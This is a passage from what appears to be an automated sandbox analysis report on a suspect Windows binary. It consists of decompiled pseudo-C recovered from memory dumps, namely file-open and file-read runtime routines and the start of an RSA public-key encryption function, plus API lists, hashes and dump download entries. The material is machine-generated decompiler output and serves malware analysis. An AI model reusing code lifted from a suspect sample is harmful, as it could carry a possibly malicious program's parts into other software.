                    											 *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                    											E0140DCFF( *_t190);
                    											L10:
                    											goto L2;
                    										}
                    									}
                    									_t269 = _t134;
                    									goto L22;
                    								} else {
                    									_t269 = E01411C42(_t205,  *_t190);
                    									__eflags = _t269;
                    									if(__eflags != 0) {
                    										L22:
                    										E014077EC(__eflags,  *_t190);
                    										return _t269;
                    									}
                    									goto L20;
                    								}
                    							}
                    							_t270 = GetLastError();
                    							E013FDB04(_t270);
                    							 *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                    							CloseHandle(_t252);
                    							__eflags = _t270;
                    							if(_t270 == 0) {
                    								 *((intOrPtr*)(E013FDB3A())) = 0xd;
                    							}
                    							goto L2;
                    						}
                    						_t234 = _v44;
                    						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                    						if((_t234 & 0xc0000000) != 0xc0000000) {
                    							L9:
                    							_t235 =  *_t190;
                    							_t237 = (_t235 & 0x0000003f) * 0x30;
                    							_t180 =  *((intOrPtr*)(0x143a740 + (_t235 >> 6) * 4));
                    							_t33 = _t180 + _t237 + 0x28;
                    							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                    							__eflags =  *_t33;
                    							E013FDB04(GetLastError());
                    							goto L10;
                    						}
                    						__eflags = _a16 & 0x00000001;
                    						if((_a16 & 0x00000001) == 0) {
                    							goto L9;
                    						}
                    						_t284 = _t277 - 0x18;
                    						_v44 = _t234 & 0x7fffffff;
                    						_t239 = 6;
                    						_push( &_v24);
                    						_push(_a12);
                    						memcpy(_t284,  &_v48, _t239 << 2);
                    						_t197 = 0;
                    						_t252 = E01411A31();
                    						_t277 = _t284 + 0x2c;
                    						_v12 = _t252;
                    						__eflags = _t252 - 0xffffffff;
                    						if(_t252 != 0xffffffff) {
                    							goto L11;
                    						}
                    						goto L9;
                    					} else {
                    						 *(E013FDB27()) =  *_t186 & 0x00000000;
                    						 *_t190 = _t263;
                    						 *((intOrPtr*)(E013FDB3A())) = 0x18;
                    						goto L2;
                    					}
                    				} else {
                    					 *(E013FDB27()) =  *_t188 & 0x00000000;
                    					 *_a8 = _t263;
                    					L2:
                    					return  *((intOrPtr*)(E013FDB3A()));
                    				}
                    			}






















































                    0x01411d15
                    0x01411d19
                    0x01411d1a
                    0x01411d1a
                    0x01411d1a
                    0x01411d1c
                    0x01411d22
                    0x01411d3d
                    0x01411d42
                    0x01411d45
                    0x01411d47
                    0x01411d49
                    0x01411d68
                    0x01411d6f
                    0x01411d76
                    0x01411d79
                    0x01411d85
                    0x01411d88
                    0x01411d90
                    0x01411d91
                    0x01411d94
                    0x01411d94
                    0x01411d96
                    0x01411d9b
                    0x01411d9d
                    0x01411da0
                    0x01411da8
                    0x01411dab
                    0x01411e18
                    0x01411e19
                    0x01411e1f
                    0x01411e21
                    0x01411e6a
                    0x01411e6d
                    0x01411e76
                    0x01411e79
                    0x01411e7c
                    0x01411e7e
                    0x01411e7e
                    0x01411e7e
                    0x01411e6f
                    0x01411e72
                    0x01411e72
                    0x01411e83
                    0x01411e86
                    0x01411e92
                    0x01411e97
                    0x01411ea3
                    0x01411ead
                    0x01411eb1
                    0x01411ebb
                    0x01411ebe
                    0x01411ec9
                    0x01411ece
                    0x01411ede
                    0x01411ee1
                    0x01411ee5
                    0x01411ee6
                    0x01411eec
                    0x01411ef1
                    0x01411ef4
                    0x01411ef6
                    0x01411ef8
                    0x01411efd
                    0x01411f00
                    0x01411f02
                    0x01411f2c
                    0x01411f50
                    0x01411f54
                    0x01411f58
                    0x01411f5a
                    0x01411f5e
                    0x01411f60
                    0x01411f6a
                    0x01411f6d
                    0x01411f74
                    0x01411f74
                    0x01411f74
                    0x01411f74
                    0x01411f5e
                    0x01411f79
                    0x01411f85
                    0x01411f87
                    0x01412012
                    0x01412012
                    0x00000000
                    0x01411f8d
                    0x01411f8d
                    0x01411f91
                    0x00000000
                    0x00000000
                    0x01411f96
                    0x01411fa8
                    0x01411fb0
                    0x01411fb3
                    0x01411fb4
                    0x01411fb7
                    0x01411fbe
                    0x01411fc3
                    0x01411fc6
                    0x01411ffa
                    0x01412004
                    0x01412004
                    0x0141200e
                    0x00000000
                    0x0141200e
                    0x01411fcf
                    0x01411fe8
                    0x01411fef
                    0x01411e12
                    0x00000000
                    0x01411e12
                    0x01411f87
                    0x01411f04
                    0x00000000
                    0x01411ed0
                    0x01411ed7
                    0x01411eda
                    0x01411edc
                    0x01411f06
                    0x01411f08
                    0x00000000
                    0x01411f0e
                    0x00000000
                    0x01411edc
                    0x01411ece
                    0x01411e29
                    0x01411e2c
                    0x01411e47
                    0x01411e4c
                    0x01411e52
                    0x01411e54
                    0x01411e5f
                    0x01411e5f
                    0x00000000
                    0x01411e54
                    0x01411dad
                    0x01411db4
                    0x01411db6
                    0x01411ded
                    0x01411ded
                    0x01411df7
                    0x01411dfa
                    0x01411e01
                    0x01411e01
                    0x01411e01
                    0x01411e0d
                    0x00000000
                    0x01411e0d
                    0x01411db8
                    0x01411dbc
                    0x00000000
                    0x00000000
                    0x01411dbe
                    0x01411dcd
                    0x01411dd2
                    0x01411dd5
                    0x01411dd6
                    0x01411dd9
                    0x01411dd9
                    0x01411de0
                    0x01411de2
                    0x01411de5
                    0x01411de8
                    0x01411deb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01411d4b
                    0x01411d50
                    0x01411d53
                    0x01411d5a
                    0x00000000
                    0x01411d5a
                    0x01411d24
                    0x01411d29
                    0x01411d2f
                    0x01411d31
                    0x00000000
                    0x01411d36

                    APIs
                      • Part of subcall function 01411A31: CreateFileW.KERNEL32(00000000,00000000,?,01411D9B,?,?,00000000,?,01411D9B,00000000,0000000C), ref: 01411A4E
                    • GetLastError.KERNEL32 ref: 01411E06
                    • __dosmaperr.LIBCMT ref: 01411E0D
                    • GetFileType.KERNEL32(00000000), ref: 01411E19
                    • GetLastError.KERNEL32 ref: 01411E23
                    • __dosmaperr.LIBCMT ref: 01411E2C
                    • CloseHandle.KERNEL32(00000000), ref: 01411E4C
                    • CloseHandle.KERNEL32(?), ref: 01411F96
                    • GetLastError.KERNEL32 ref: 01411FC8
                    • __dosmaperr.LIBCMT ref: 01411FCF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: dc338be2c7b262fece95d4bf88bc06c4001e341de411fea067b3d88815970ae8
                    • Instruction ID: 1bbbaa64f16d8422e607ec9b786e6010cc9e20f8d1677a705d767fbfefd21489
                    • Opcode Fuzzy Hash: dc338be2c7b262fece95d4bf88bc06c4001e341de411fea067b3d88815970ae8
                    • Instruction Fuzzy Hash: DBA15732A101498FDF1A9FBCD891BAE7BB1AB06320F24015EE901DF3A5D7359813C751
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E01410D3E(signed int _a4, void* _a8, unsigned int _a12) {
                    				signed int _v5;
                    				char _v6;
                    				void* _v12;
                    				unsigned int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				void* _v32;
                    				long _v36;
                    				void* _v40;
                    				long _v44;
                    				signed int* _t143;
                    				signed int _t145;
                    				intOrPtr _t149;
                    				signed int _t153;
                    				signed int _t155;
                    				signed char _t157;
                    				unsigned int _t158;
                    				intOrPtr _t162;
                    				void* _t163;
                    				signed int _t164;
                    				signed int _t167;
                    				long _t168;
                    				intOrPtr _t175;
                    				signed int _t176;
                    				intOrPtr _t178;
                    				signed int _t180;
                    				signed int _t184;
                    				char _t191;
                    				char* _t192;
                    				char _t199;
                    				char* _t200;
                    				signed char _t211;
                    				signed int _t213;
                    				long _t215;
                    				signed int _t216;
                    				char _t218;
                    				signed char _t222;
                    				signed int _t223;
                    				unsigned int _t224;
                    				intOrPtr _t225;
                    				unsigned int _t229;
                    				signed int _t231;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t234;
                    				signed int _t235;
                    				signed char _t236;
                    				signed int _t237;
                    				signed int _t239;
                    				signed int _t240;
                    				signed int _t241;
                    				signed int _t242;
                    				signed int _t246;
                    				void* _t248;
                    				void* _t249;
                    
                    				_t213 = _a4;
                    				if(_t213 != 0xfffffffe) {
                    					__eflags = _t213;
                    					if(_t213 < 0) {
                    						L58:
                    						_t143 = E013FDB27();
                    						 *_t143 =  *_t143 & 0x00000000;
                    						__eflags =  *_t143;
                    						 *((intOrPtr*)(E013FDB3A())) = 9;
                    						L59:
                    						_t145 = E013FDA61();
                    						goto L60;
                    					}
                    					__eflags = _t213 -  *0x143a940; // 0x40
                    					if(__eflags >= 0) {
                    						goto L58;
                    					}
                    					_v24 = 1;
                    					_t239 = _t213 >> 6;
                    					_t235 = (_t213 & 0x0000003f) * 0x30;
                    					_v20 = _t239;
                    					_t149 =  *((intOrPtr*)(0x143a740 + _t239 * 4));
                    					_v28 = _t235;
                    					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                    					_v5 = _t222;
                    					__eflags = _t222 & 0x00000001;
                    					if((_t222 & 0x00000001) == 0) {
                    						goto L58;
                    					}
                    					_t223 = _a12;
                    					__eflags = _t223 - 0x7fffffff;
                    					if(_t223 <= 0x7fffffff) {
                    						__eflags = _t223;
                    						if(_t223 == 0) {
                    							L57:
                    							return 0;
                    						}
                    						__eflags = _v5 & 0x00000002;
                    						if((_v5 & 0x00000002) != 0) {
                    							goto L57;
                    						}
                    						__eflags = _a8;
                    						if(_a8 == 0) {
                    							goto L6;
                    						}
                    						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                    						_v5 = _t153;
                    						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                    						_t246 = 0;
                    						_t155 = _t153 - 1;
                    						__eflags = _t155;
                    						if(_t155 == 0) {
                    							_t236 = _v24;
                    							_t157 =  !_t223;
                    							__eflags = _t236 & _t157;
                    							if((_t236 & _t157) != 0) {
                    								_t158 = 4;
                    								_t224 = _t223 >> 1;
                    								_v16 = _t158;
                    								__eflags = _t224 - _t158;
                    								if(_t224 >= _t158) {
                    									_t158 = _t224;
                    									_v16 = _t224;
                    								}
                    								_t246 = E0140131B(_t224, _t158);
                    								E014012E1(0);
                    								E014012E1(0);
                    								_t249 = _t248 + 0xc;
                    								_v12 = _t246;
                    								__eflags = _t246;
                    								if(_t246 != 0) {
                    									_t162 = E01408E19(_t213, 0, 0, _v24);
                    									_t225 =  *((intOrPtr*)(0x143a740 + _t239 * 4));
                    									_t248 = _t249 + 0x10;
                    									_t240 = _v28;
                    									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                    									_t163 = _t246;
                    									 *(_t240 + _t225 + 0x24) = _t236;
                    									_t235 = _t240;
                    									_t223 = _v16;
                    									L21:
                    									_t241 = 0;
                    									_v40 = _t163;
                    									_t215 =  *((intOrPtr*)(0x143a740 + _v20 * 4));
                    									_v36 = _t215;
                    									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                    									_t216 = _a4;
                    									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                    										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                    										_v6 = _t218;
                    										__eflags = _t218 - 0xa;
                    										_t216 = _a4;
                    										if(_t218 != 0xa) {
                    											__eflags = _t223;
                    											if(_t223 != 0) {
                    												_t241 = _v24;
                    												 *_t163 = _v6;
                    												_t216 = _a4;
                    												_t232 = _t223 - 1;
                    												__eflags = _v5;
                    												_v12 = _t163 + 1;
                    												_v16 = _t232;
                    												 *((char*)(_t235 +  *((intOrPtr*)(0x143a740 + _v20 * 4)) + 0x2a)) = 0xa;
                    												if(_v5 != 0) {
                    													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x143a740 + _v20 * 4)) + 0x2b));
                    													_v6 = _t191;
                    													__eflags = _t191 - 0xa;
                    													if(_t191 != 0xa) {
                    														__eflags = _t232;
                    														if(_t232 != 0) {
                    															_t192 = _v12;
                    															_t241 = 2;
                    															 *_t192 = _v6;
                    															_t216 = _a4;
                    															_t233 = _t232 - 1;
                    															_v12 = _t192 + 1;
                    															_v16 = _t233;
                    															 *((char*)(_t235 +  *((intOrPtr*)(0x143a740 + _v20 * 4)) + 0x2b)) = 0xa;
                    															__eflags = _v5 - _v24;
                    															if(_v5 == _v24) {
                    																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x143a740 + _v20 * 4)) + 0x2c));
                    																_v6 = _t199;
                    																__eflags = _t199 - 0xa;
                    																if(_t199 != 0xa) {
                    																	__eflags = _t233;
                    																	if(_t233 != 0) {
                    																		_t200 = _v12;
                    																		_t241 = 3;
                    																		 *_t200 = _v6;
                    																		_t216 = _a4;
                    																		_t234 = _t233 - 1;
                    																		__eflags = _t234;
                    																		_v12 = _t200 + 1;
                    																		_v16 = _t234;
                    																		 *((char*)(_t235 +  *((intOrPtr*)(0x143a740 + _v20 * 4)) + 0x2c)) = 0xa;
                    																	}
                    																}
                    															}
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    									_t164 = E014106A8(_t216);
                    									__eflags = _t164;
                    									if(_t164 == 0) {
                    										L41:
                    										_v24 = 0;
                    										L42:
                    										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
                    										__eflags = _t167;
                    										if(_t167 == 0) {
                    											L53:
                    											_t168 = GetLastError();
                    											_t241 = 5;
                    											__eflags = _t168 - _t241;
                    											if(_t168 != _t241) {
                    												__eflags = _t168 - 0x6d;
                    												if(_t168 != 0x6d) {
                    													L37:
                    													E013FDB04(_t168);
                    													goto L38;
                    												}
                    												_t242 = 0;
                    												goto L39;
                    											}
                    											 *((intOrPtr*)(E013FDB3A())) = 9;
                    											 *(E013FDB27()) = _t241;
                    											goto L38;
                    										}
                    										_t229 = _a12;
                    										__eflags = _v36 - _t229;
                    										if(_v36 > _t229) {
                    											goto L53;
                    										}
                    										_t242 = _t241 + _v36;
                    										__eflags = _t242;
                    										L45:
                    										_t237 = _v28;
                    										_t175 =  *((intOrPtr*)(0x143a740 + _v20 * 4));
                    										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                    										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                    											__eflags = _v5 - 2;
                    											if(_v5 == 2) {
                    												__eflags = _v24;
                    												_push(_t242 >> 1);
                    												_push(_v40);
                    												_push(_t216);
                    												if(_v24 == 0) {
                    													_t176 = E0141089A();
                    												} else {
                    													_t176 = E01410BAA();
                    												}
                    											} else {
                    												_t230 = _t229 >> 1;
                    												__eflags = _t229 >> 1;
                    												_t176 = E01410A5A(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                    											}
                    											_t242 = _t176;
                    										}
                    										goto L39;
                    									}
                    									_t231 = _v28;
                    									_t178 =  *((intOrPtr*)(0x143a740 + _v20 * 4));
                    									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                    									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                    										goto L41;
                    									}
                    									_t180 = GetConsoleMode(_v32,  &_v44);
                    									__eflags = _t180;
                    									if(_t180 == 0) {
                    										goto L41;
                    									}
                    									__eflags = _v5 - 2;
                    									if(_v5 != 2) {
                    										goto L42;
                    									}
                    									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                    									__eflags = _t184;
                    									if(_t184 != 0) {
                    										_t229 = _a12;
                    										_t242 = _t241 + _v36 * 2;
                    										goto L45;
                    									}
                    									_t168 = GetLastError();
                    									goto L37;
                    								} else {
                    									 *((intOrPtr*)(E013FDB3A())) = 0xc;
                    									 *(E013FDB27()) = 8;
                    									L38:
                    									_t242 = _t241 | 0xffffffff;
                    									__eflags = _t242;
                    									L39:
                    									E014012E1(_t246);
                    									return _t242;
                    								}
                    							}
                    							L15:
                    							 *(E013FDB27()) =  *_t206 & _t246;
                    							 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    							E013FDA61();
                    							goto L38;
                    						}
                    						__eflags = _t155 != 1;
                    						if(_t155 != 1) {
                    							L13:
                    							_t163 = _a8;
                    							_v16 = _t223;
                    							_v12 = _t163;
                    							goto L21;
                    						}
                    						_t211 =  !_t223;
                    						__eflags = _t211 & 0x00000001;
                    						if((_t211 & 0x00000001) == 0) {
                    							goto L15;
                    						}
                    						goto L13;
                    					}
                    					L6:
                    					 *(E013FDB27()) =  *_t151 & 0x00000000;
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					goto L59;
                    				} else {
                    					 *(E013FDB27()) =  *_t212 & 0x00000000;
                    					_t145 = E013FDB3A();
                    					 *_t145 = 9;
                    					L60:
                    					return _t145 | 0xffffffff;
                    				}
                    			}



























































                    0x01410d47
                    0x01410d4e
                    0x01410d68
                    0x01410d6a
                    0x014110d2
                    0x014110d2
                    0x014110d7
                    0x014110d7
                    0x014110df
                    0x014110e5
                    0x014110e5
                    0x00000000
                    0x014110e5
                    0x01410d70
                    0x01410d76
                    0x00000000
                    0x00000000
                    0x01410d7e
                    0x01410d8a
                    0x01410d8d
                    0x01410d90
                    0x01410d93
                    0x01410d9a
                    0x01410d9d
                    0x01410da1
                    0x01410da4
                    0x01410da7
                    0x00000000
                    0x00000000
                    0x01410dad
                    0x01410db0
                    0x01410db6
                    0x01410dd0
                    0x01410dd2
                    0x014110ce
                    0x00000000
                    0x014110ce
                    0x01410dd8
                    0x01410ddc
                    0x00000000
                    0x00000000
                    0x01410de2
                    0x01410de6
                    0x00000000
                    0x00000000
                    0x01410ded
                    0x01410df1
                    0x01410df4
                    0x01410df7
                    0x01410dfc
                    0x01410dfc
                    0x01410dff
                    0x01410e1c
                    0x01410e21
                    0x01410e23
                    0x01410e25
                    0x01410e45
                    0x01410e46
                    0x01410e48
                    0x01410e4b
                    0x01410e4d
                    0x01410e4f
                    0x01410e51
                    0x01410e51
                    0x01410e5c
                    0x01410e5e
                    0x01410e65
                    0x01410e6a
                    0x01410e6d
                    0x01410e70
                    0x01410e72
                    0x01410e97
                    0x01410e9c
                    0x01410ea3
                    0x01410ea6
                    0x01410ea9
                    0x01410ead
                    0x01410eaf
                    0x01410eb3
                    0x01410eb5
                    0x01410eb8
                    0x01410ebb
                    0x01410ebd
                    0x01410ec0
                    0x01410ec7
                    0x01410eca
                    0x01410ecf
                    0x01410ed2
                    0x01410edb
                    0x01410edf
                    0x01410ee2
                    0x01410ee5
                    0x01410ee8
                    0x01410eee
                    0x01410ef0
                    0x01410ef9
                    0x01410efc
                    0x01410eff
                    0x01410f02
                    0x01410f03
                    0x01410f07
                    0x01410f0d
                    0x01410f17
                    0x01410f1c
                    0x01410f2c
                    0x01410f30
                    0x01410f33
                    0x01410f35
                    0x01410f37
                    0x01410f39
                    0x01410f3b
                    0x01410f43
                    0x01410f44
                    0x01410f47
                    0x01410f4a
                    0x01410f4b
                    0x01410f51
                    0x01410f5b
                    0x01410f63
                    0x01410f66
                    0x01410f72
                    0x01410f76
                    0x01410f79
                    0x01410f7b
                    0x01410f7d
                    0x01410f7f
                    0x01410f81
                    0x01410f89
                    0x01410f8a
                    0x01410f8d
                    0x01410f90
                    0x01410f90
                    0x01410f91
                    0x01410f97
                    0x01410fa1
                    0x01410fa1
                    0x01410f7f
                    0x01410f7b
                    0x01410f66
                    0x01410f39
                    0x01410f35
                    0x01410f1c
                    0x01410ef0
                    0x01410ee8
                    0x01410fa7
                    0x01410fad
                    0x01410faf
                    0x01411022
                    0x01411022
                    0x01411026
                    0x01411036
                    0x0141103c
                    0x0141103e
                    0x0141109a
                    0x0141109a
                    0x014110a2
                    0x014110a3
                    0x014110a5
                    0x014110be
                    0x014110c1
                    0x01410ffe
                    0x01410fff
                    0x00000000
                    0x01411004
                    0x014110c7
                    0x00000000
                    0x014110c7
                    0x014110ac
                    0x014110b7
                    0x00000000
                    0x014110b7
                    0x01411040
                    0x01411043
                    0x01411046
                    0x00000000
                    0x00000000
                    0x01411048
                    0x01411048
                    0x0141104b
                    0x0141104e
                    0x01411051
                    0x01411058
                    0x0141105d
                    0x0141105f
                    0x01411063
                    0x0141107e
                    0x01411082
                    0x01411083
                    0x01411086
                    0x01411087
                    0x01411093
                    0x01411089
                    0x01411089
                    0x01411089
                    0x01411065
                    0x01411065
                    0x01411065
                    0x01411070
                    0x01411075
                    0x01411078
                    0x01411078
                    0x00000000
                    0x0141105d
                    0x01410fb4
                    0x01410fb7
                    0x01410fbe
                    0x01410fc3
                    0x00000000
                    0x00000000
                    0x01410fcc
                    0x01410fd2
                    0x01410fd4
                    0x00000000
                    0x00000000
                    0x01410fd6
                    0x01410fda
                    0x00000000
                    0x00000000
                    0x01410fee
                    0x01410ff4
                    0x01410ff6
                    0x0141101a
                    0x0141101d
                    0x00000000
                    0x0141101d
                    0x01410ff8
                    0x00000000
                    0x01410e74
                    0x01410e79
                    0x01410e84
                    0x01411005
                    0x01411005
                    0x01411005
                    0x01411008
                    0x01411009
                    0x00000000
                    0x01411011
                    0x01410e72
                    0x01410e27
                    0x01410e2c
                    0x01410e33
                    0x01410e39
                    0x00000000
                    0x01410e39
                    0x01410e01
                    0x01410e04
                    0x01410e0e
                    0x01410e0e
                    0x01410e11
                    0x01410e14
                    0x00000000
                    0x01410e14
                    0x01410e08
                    0x01410e0a
                    0x01410e0c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01410e0c
                    0x01410db8
                    0x01410dbd
                    0x01410dc5
                    0x00000000
                    0x01410d50
                    0x01410d55
                    0x01410d58
                    0x01410d5d
                    0x014110ea
                    0x00000000
                    0x014110ea

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: abd3f499ce84639333514a57c700b7319f4c9cd9e030fe10ad769bafaea7863b
                    • Instruction ID: 0ae928f6860e6469364cf03f9c77805b3519ce39a06e100241e90249e9e6145a
                    • Opcode Fuzzy Hash: abd3f499ce84639333514a57c700b7319f4c9cd9e030fe10ad769bafaea7863b
                    • Instruction Fuzzy Hash: 4DC1E6B0E0428A9FDF12CFADC844BAEBFB0AF59314F14415AE644A73A5C7749941CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E013E3220(intOrPtr* __ecx) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t100;
                    				signed int _t101;
                    				void* _t108;
                    				void* _t109;
                    				void* _t111;
                    				intOrPtr* _t112;
                    				intOrPtr* _t116;
                    				void* _t119;
                    				void* _t134;
                    				void* _t139;
                    				void* _t145;
                    				void* _t147;
                    				void* _t149;
                    				void* _t151;
                    				void* _t153;
                    				void* _t155;
                    				void* _t157;
                    				void* _t162;
                    				void* _t164;
                    				intOrPtr* _t169;
                    				intOrPtr* _t173;
                    				signed int _t206;
                    				signed int _t208;
                    				intOrPtr _t222;
                    				void* _t226;
                    				void* _t227;
                    				signed int _t230;
                    				void* _t231;
                    				void* _t233;
                    
                    				_t230 = _t231 - 0xfc;
                    				_push(0xffffffff);
                    				_push(E014175CC);
                    				_push( *[fs:0x0]);
                    				_t233 = _t231 - 0xac;
                    				_t100 =  *0x1435234; // 0x78d9f939
                    				_t101 = _t100 ^ _t230;
                    				 *(_t230 + 0xf8) = _t101;
                    				_push(_t212);
                    				_push(_t101);
                    				 *[fs:0x0] = _t230 - 0xc;
                    				_t169 = __ecx;
                    				 *((intOrPtr*)(_t230 - 0x18)) = __ecx;
                    				_t222 =  *((intOrPtr*)(_t230 + 0x10c));
                    				 *((intOrPtr*)(_t230 - 0x14)) =  *((intOrPtr*)(_t230 + 0x104));
                    				 *((intOrPtr*)(_t230 - 0x24)) =  *((intOrPtr*)(_t230 + 0x108));
                    				 *((intOrPtr*)(_t230 - 0x2c)) =  *((intOrPtr*)(_t230 + 0x110));
                    				 *((intOrPtr*)(_t230 - 0x1c)) =  *((intOrPtr*)(_t230 + 0x114));
                    				 *((intOrPtr*)(_t230 - 0x20)) = _t222;
                    				_t108 =  *((intOrPtr*)( *__ecx + 0x14))();
                    				_t173 = __ecx;
                    				if(_t222 > _t108) {
                    					_t139 =  *((intOrPtr*)( *__ecx + 0x14))();
                    					_t243 = _t139 - 1;
                    					if(_t139 < 1) {
                    						_push(_t230 + 0xe0);
                    						_t162 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 8))();
                    						 *((intOrPtr*)(_t230 - 4)) = 0;
                    						_t164 = E013C1DF7(__ecx, __ecx + 4, _t230 + 0xe0, _t230 + 0xc8, _t162, ": this key is too short to encrypt any messages");
                    						_t233 = _t233 + 0xc;
                    						 *((char*)(_t230 - 4)) = 1;
                    						E013CB190(_t164);
                    						E013F4EC6(_t230 + 0xa0, 0x1430adc);
                    					}
                    					_t212 = E013E9DA0(_t230 + 0xc8,  *((intOrPtr*)( *_t169 + 0x14))(), 0xa);
                    					 *((intOrPtr*)(_t230 - 4)) = 2;
                    					_t145 = E013E9DA0(_t230 + 0xe0, _t222, 0xa);
                    					_t210 =  *((intOrPtr*)(_t169 + 4));
                    					_t199 = _t169 + 4;
                    					 *((char*)(_t230 - 4)) = 3;
                    					_t147 =  *((intOrPtr*)( *((intOrPtr*)(_t169 + 4)) + 8))(_t230 + 0x60);
                    					 *((char*)(_t230 - 4)) = 4;
                    					_t149 = E013C1DF7(_t169, _t169 + 4,  *((intOrPtr*)(_t169 + 4)), _t230 + 0x48, _t147, ": message length of ");
                    					 *((char*)(_t230 - 4)) = 5;
                    					_t151 = E013C1DA9(_t169, _t169 + 4, _t143, _t230 + 0x30, _t149, _t145);
                    					 *((char*)(_t230 - 4)) = 6;
                    					_t153 = E013C1DF7(_t169, _t169 + 4,  *((intOrPtr*)(_t169 + 4)), _t230 + 0x18, _t151, " exceeds the maximum of ");
                    					 *((char*)(_t230 - 4)) = 7;
                    					_t155 = E013C1DA9(_t169, _t169 + 4, _t143, _t230, _t153, _t143);
                    					 *((char*)(_t230 - 4)) = 8;
                    					_t157 = E013C1DF7(_t169, _t199, _t210, _t230 + 0xb0, _t155, " for this public key");
                    					_t233 = _t233 + 0x54;
                    					_t173 = _t230 + 0x78;
                    					 *((char*)(_t230 - 4)) = 9;
                    					E013CB190(_t157);
                    					E013F4EC6(_t230 + 0x78, 0x1430adc);
                    				}
                    				_t109 = E013C50E6(_t173, _t243);
                    				 *((intOrPtr*)(_t230 + 0xec)) = 0xffffffff;
                    				_t111 = _t109 + 7 >> 3;
                    				 *(_t230 - 0x28) = _t111;
                    				 *(_t230 + 0xf0) = _t111;
                    				_t244 = _t111;
                    				if(_t111 != 0) {
                    					_t111 = E013CD9F0(_t173, _t212, _t244, _t111);
                    					_t233 = _t233 + 4;
                    				}
                    				 *(_t230 - 0x10) = _t111;
                    				 *(_t230 + 0xf4) = _t111;
                    				 *((intOrPtr*)(_t230 - 4)) = 0xc;
                    				_t112 =  *((intOrPtr*)( *((intOrPtr*)(_t169 + 8)) + 0xc))();
                    				 *((intOrPtr*)( *_t112 + 0xc))( *((intOrPtr*)(_t230 - 0x14)),  *((intOrPtr*)(_t230 - 0x24)),  *((intOrPtr*)(_t230 - 0x20)),  *(_t230 - 0x10), E013C50E6( *((intOrPtr*)(_t230 - 0x18)), _t244),  *((intOrPtr*)(_t230 - 0x1c)));
                    				_t116 =  *((intOrPtr*)( *((intOrPtr*)(_t169 + 8)) + 8))();
                    				 *((char*)(_t230 - 4)) = 0xd;
                    				_t119 =  *((intOrPtr*)( *_t116 + 0x14))(_t230 - 0x44,  *((intOrPtr*)(_t230 - 0x14)), E013D2270(_t230 - 0x5c,  *((intOrPtr*)(_t169 + 8)),  *(_t230 - 0x10),  *(_t230 - 0x28), 0, 1));
                    				 *((char*)(_t230 - 4)) = 0xe;
